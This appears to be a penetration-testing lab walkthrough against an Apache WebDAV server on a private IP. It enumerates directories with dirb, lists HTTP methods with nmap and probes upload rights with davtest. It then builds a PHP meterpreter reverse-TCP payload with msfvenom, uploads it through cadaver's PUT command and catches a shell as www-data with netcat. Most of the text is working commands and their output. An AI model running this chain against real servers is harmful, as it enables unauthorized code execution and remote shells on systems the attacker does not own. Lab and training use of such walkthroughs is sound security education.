The server we are going to audit has the following fingerprint.
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
Next we need to find out the webdav directory. For this we will use the 'dirb' utility to look for the directory.
root@kali:~# dirb http://192.168.155.142/ /usr/share/wordlists/dirb/common.txt ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Fri Feb 26 19:05:28 2021 URL_BASE: http://192.168.155.142/ WORDLIST_FILES: /usr/share/wordlists/dirb/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://192.168.155.142/ ---- + http://192.168.155.142/cgi-bin/ (CODE:403|SIZE:296) ==> DIRECTORY: http://192.168.155.142/dav/ + http://192.168.155.142/index (CODE:200|SIZE:891) + http://192.168.155.142/index.php (CODE:200|SIZE:891) + http://192.168.155.142/phpinfo (CODE:200|SIZE:48107) + http://192.168.155.142/phpinfo.php (CODE:200|SIZE:48119)
dirb found the directory '/dav/' which we will use to test. We can use nmap again to find out all of the supported methods on the webdav directory using an nmap script.
sam@kali:~$ nmap -p80 --script http-methods --script-args http-methods.test-all=true,http-methods.url-path='/dav/' 192.168.155.142 Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-26 19:38 CST Nmap scan report for 192.168.155.142 Host is up (0.00040s latency). PORT STATE SERVICE 80/tcp open http | http-methods: | Supported Methods: OPTIONS GET HEAD POST DELETE TRACE PROPFIND PROPPATCH COPY MOVE LOCK UNLOCK PUT CONNECT | Potentially risky methods: DELETE TRACE PROPFIND PROPPATCH COPY MOVE LOCK UNLOCK PUT CONNECT |_ Path tested: /dav/ Nmap done: 1 IP address (1 host up) scanned in 0.46 seconds sam@kali:~$
As you can see we have access to methods like DELETE, COPY, MOVE and PUT at our disposal. What we want to do is upload a file to the server and get a reverse shell. For our next test we will use the utility 'davtest' to check the permissions we have on the server.
sam@kali:~$ davtest -url http://192.168.155.142/dav -cleanup -quiet /usr/bin/davtest Summary: Created: http://192.168.155.142/dav/DavTestDir_mJBJrXiU PUT File: http://192.168.155.142/dav/DavTestDir_mJBJrXiU/davtest_mJBJrXiU.pl PUT File: http://192.168.155.142/dav/DavTestDir_mJBJrXiU/davtest_mJBJrXiU.jsp PUT File: http://192.168.155.142/dav/DavTestDir_mJBJrXiU/davtest_mJBJrXiU.jhtml PUT File: http://192.168.155.142/dav/DavTestDir_mJBJrXiU/davtest_mJBJrXiU.shtml PUT File: http://192.168.155.142/dav/DavTestDir_mJBJrXiU/davtest_mJBJrXiU.asp PUT File: http://192.168.155.142/dav/DavTestDir_mJBJrXiU/davtest_mJBJrXiU.aspx PUT File: http://192.168.155.142/dav/DavTestDir_mJBJrXiU/davtest_mJBJrXiU.php PUT File: http://192.168.155.142/dav/DavTestDir_mJBJrXiU/davtest_mJBJrXiU.cfm PUT File: http://192.168.155.142/dav/DavTestDir_mJBJrXiU/davtest_mJBJrXiU.html PUT File: http://192.168.155.142/dav/DavTestDir_mJBJrXiU/davtest_mJBJrXiU.cgi PUT File: http://192.168.155.142/dav/DavTestDir_mJBJrXiU/davtest_mJBJrXiU.txt Executes: http://192.168.155.142/dav/DavTestDir_mJBJrXiU/davtest_mJBJrXiU.php Executes: http://192.168.155.142/dav/DavTestDir_mJBJrXiU/davtest_mJBJrXiU.html Executes: http://192.168.155.142/dav/DavTestDir_mJBJrXiU/davtest_mJBJrXiU.txt DELETED: http://192.168.155.142/dav/DavTestDir_mJBJrXiU sam@kali:~$
davtest cam back with some intresting results. We where able to upload a wide range of files to the remote host, but if we look only three of those file types are we able to execute. The file type we are concerned with is the '.php' exstension. We can generate a reverse shell PHP payload with msfvenom to upload to the remote host.
sam@kali:~$ msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.155.128 LPORT=8888 -f raw > payload.php [-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload [-] No arch selected, selecting arch: php from the payload No encoder specified, outputting raw payload Payload size: 30691 bytes sam@kali:~$
After we generate the payload, we move on to another tool we can use to upload the file to the remote host. The 'cadaver' tool allows us to connect to the webdav instance and gives us a bunch of commands to execute. The command we are interested in is the 'PUT' command.
sam@kali:~$ cadaver http://192.168.155.142/dav dav:/dav/> ? Available commands: ls cd pwd put get mget mput edit less mkcol cat delete rmcol copy move lock unlock discover steal showlocks version checkin checkout uncheckout history label propnames chexec propget propdel propset search set open close echo quit unset lcd lls lpwd logout help describe about Aliases: rm=delete, mkdir=mkcol, mv=move, cp=copy, more=less, quit=exit=bye dav:/dav/> put /home/sam/payload.php Uploading /home/sam/payload.php to `/dav/payload.php': Progress: [=============================>] 100.0% of 30686 bytes succeeded. dav:/dav/>
Our file uploaded sucessfully. Now we can move on to visiting the url 'http://192.168.155.142/dav/payload.php' and execute the payload giving us a reverse connect back shell on the box.
sam@kali:~$ nc -nvlp 8888 Listening on [0.0.0.0] (family 0, port 8888) Connection from 192.168.155.142 36422 received! id uid=33(www-data) gid=33(www-data) groups=33(www-data) whoami www-data